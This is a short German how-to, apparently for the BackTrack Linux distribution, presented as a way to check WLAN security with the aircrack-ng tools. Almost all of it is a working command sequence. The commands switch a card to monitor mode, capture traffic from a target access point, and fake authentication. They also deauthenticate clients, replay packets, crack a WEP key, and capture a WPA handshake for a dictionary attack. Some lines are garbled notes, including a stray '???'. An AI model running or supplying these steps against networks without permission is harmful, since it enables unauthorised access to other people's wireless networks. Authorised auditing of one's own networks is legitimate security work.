Sicherheit von WLan Netzwerken überprüfen
Anmerkung:
Dieses HowTo wurde für die BackToTrack Distribution geschrieben, sollte aber auch auf andere Linux Distributionen mit dem richtigen WLan Treiber umsetzbar sein. Der Knackpunkt ist der Monitor Mode der W-Lan Karte.
Nic in den Monitor Mode setzten:
iwconfig wlanconfig ath0 destroy wlanconfig ath0 create wlandev wifi0 wlanmode monitor
Wlan Netze suchen:
airodump-ng ath0
Dump Datei erzeugen: -c Channel –bssid Mac des Accesspoints -w Dump-dateiname
airodump-ng -c 6 --bssid 00:00:00:00 -w testdump ath0
Test nach Mac Sicherheit: -e SSID -a MAC des Accespoints -h eigene MAC
aireplay-ng -1 0 -e WLAN -a 00:04:0E:D8:62:A5 -h 00:15:AF:8D:A6:B3 ath0
???
aireplay-ng -1 30 -e WLAN -a 00:04:0E:D8:62:A5 -h 00:15:AF:8D:A6:B3 ath0 aireplay-ng -0 10 -e WLAN -a 00:04:0E:D8:62:A5 -h 00:15:AF:8D:A6:B3 ath0
Pakete übertragen:
aireplay-ng -3 -b 00:90:4B:73:B3:A2 -h 00:15:AF:8D:A6:B3 ath0
WEP Schlüssel rausfinden: -z Dump-Dateiname
aircrack-ng testdump-01.cap
WPA Attacke: Man benötigt eine Client Mac und einen Client der im Netz ist.
aireplay-ng -0 5 -e SSID -a BSSID -c ClientMac ath0 aircrack-ng file.cap -a 2 -b BSSID -w passwordlist.txt
WLan Karte wieder in den nornmalen Mode setzten
wlanconfig ath0 destroy wlanconfig ath0 create wlandev wifi0 wlanmode standard